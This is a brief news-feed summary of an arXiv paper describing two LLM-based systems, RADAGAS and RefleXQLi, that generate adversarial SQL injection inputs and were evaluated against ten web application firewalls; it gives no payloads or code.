ARTFEED — Contemporary Art Intelligence

LLM-Based Systems for Adversarial SQL Injection Generation

ai-technology · 2026-05-13

A new paper on arXiv (2605.11188) introduces two cutting-edge systems that harness LLMs to develop adversarial SQL injection attacks: RADAGAS (Retrieval Augmented Generation for Adversarial SQLi) and RefleXQLi (Reflective Chain-of-Thought SQLi). These systems were tested against various benchmarks, using ten different Web Application Firewalls (WAFs) alongside a MySQL validator. The assessment includes six open-source rule-based WAFs (ModSecurity PL1-3, Coraza PL1-3), two AI/ML-based WAFs (WAF Brain, CNN-WAF), and two commercial solutions, one being AWS WAF. OWASP highlights that SQL injection remains a major risk, and this research leverages AI and LLM advancements to improve adversarial security testing.

Key facts

  • arXiv paper 2605.11188 introduces RADAGAS and RefleXQLi systems
  • Systems generate adversarial SQL injection attacks using LLMs
  • Compared against 10 WAFs and one MySQL validator
  • WAFs include ModSecurity PL1-3, Coraza PL1-3, WAF Brain, CNN-WAF, AWS WAF
  • SQL injection is a top OWASP threat
  • LLMs enable automated adversarial attack testing

Entities

Institutions

  • Open Worldwide Application Security Project (OWASP)
  • ModSecurity
  • Coraza
  • WAF Brain
  • CNN-WAF
  • AWS WAF
  • arXiv

Sources